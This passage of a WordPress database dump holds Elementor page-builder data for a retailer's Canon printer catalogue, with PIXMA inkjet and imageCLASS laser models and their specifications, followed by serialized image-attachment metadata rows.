:-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p><br \\/>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p><br \\/>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p><br \\/>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3857,2730,'_wp_attached_file','2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png'),(3858,2730,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:54:\"2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:54:\"bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3859,2731,'_wp_attached_file','2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png'),(3860,2731,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:65:\"2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:65:\"3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:65:\"3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:65:\"3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:65:\"3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:63:\"3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3861,2732,'_wp_attached_file','2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png'),(3862,2732,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:66:\"2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:66:\"3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:66:\"3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:66:\"3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:66:\"3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:64:\"3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3867,2733,'_elementor_version','0.4'),(4034,2731,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.2307236997869157590912436717189848423004150390625;s:5:\"bytes\";i:9357;s:11:\"size_before\";i:101368;s:10:\"size_after\";i:92011;s:4:\"time\";d:0.55999999999999994226840271949185989797115325927734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:654;s:11:\"size_before\";i:10839;s:10:\"size_after\";i:10185;s:4:\"time\";d:0.